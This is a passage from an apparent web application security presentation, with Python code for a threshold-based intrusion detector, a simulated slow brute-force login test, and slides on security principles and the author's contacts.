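    def __init__(self, thresholds=THRESHOLDS, clock=time.time):
        self._thresholds = thresholds
        self._clock = clock
        self._events = defaultdict(deque)   # (event, subject type, subject, window) -> timestamps
        self.alerts = []                    # what the management console would list
        self.logged_out = set()
        self.locked_accounts = set()
        self.blocked_ips = set()

    def add_event(self, event, user, ip):
        """Report one security event (the application calls this where it raises the
        corresponding exception). Returns the set of actions this event triggered."""
        now = self._clock()
        fired = set()
        for rule in self._thresholds.get(event, []):
            subject = user if rule["subject"] == "user" else ip
            stamps = self._events[(event, rule["subject"], subject, rule["window"])]
            stamps.append(now)
            while stamps and stamps[0] <= now - rule["window"]:
                stamps.popleft()            # forget events outside the sliding window
            if len(stamps) >= rule["count"]:
                fired.update(rule["actions"])
                self._apply(rule["actions"], event, user, ip, len(stamps), rule["window"])
        return fired

    def _apply(self, actions, event, user, ip, n, window):
        for action in actions:
            if action == "log":
                self.alerts.append("%d x %s for user=%s ip=%s within %ds" % (n, event, user, ip, window))
            elif action == "logout":
                self.logged_out.add(user)
            elif action == "lock_account":
                self.locked_accounts.add(user)
            elif action == "block_ip":
                self.blocked_ips.add(ip)

def simulate_brute_force(failures=10, spacing=20):
    """Constructed scenario: one client fails to log in `failures` times, `spacing` seconds
    apart, against a detector driven by a fake clock. Returns (detector, actions per event)."""
    t = [1000.0]
    det = IntrusionDetector(clock=lambda: t[0])
    history = []
    for _ in range(failures):
        history.append(det.add_event("InvalidCredentials", "admin", "203.0.113.7"))
        t[0] += spacing
    return det, history

if __name__ == "__main__":
    det, history = simulate_brute_force()
    for i, fired in enumerate(history, 1):
        print("failure %2d -> %s" % (i, sorted(fired) or "-"))
    print("console:", det.alerts)
    print("locked:", det.locked_accounts)
```

Slow attempts (20 s apart) never reach the 5-in-60-seconds rule but do reach the 10-in-300-seconds rule, which is why thresholds with several windows are worth configuring.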
  76. Proven application security principles
     - Apply defense in depth
     - Use a positive security model
       - fail-safe defaults, minimize attack surface
     - Fail securely
     - Run with least privilege
     - Avoid security by obscurity
     - Keep security simple
     - Detect intrusions
     - Don't trust infrastructure
     - Don't trust services
  77. Want to know more?
     - My blog
       - http://www.carlobonamico.com
     - My Company
       - http://www.nispro.it
     - JUG Genova
       - http://juggenova.net
     - Attend a course
       - Web Application Security (3 days)
       - http://www.nispro.it/education/education_focus_sec.html
     Thank you for your attention!
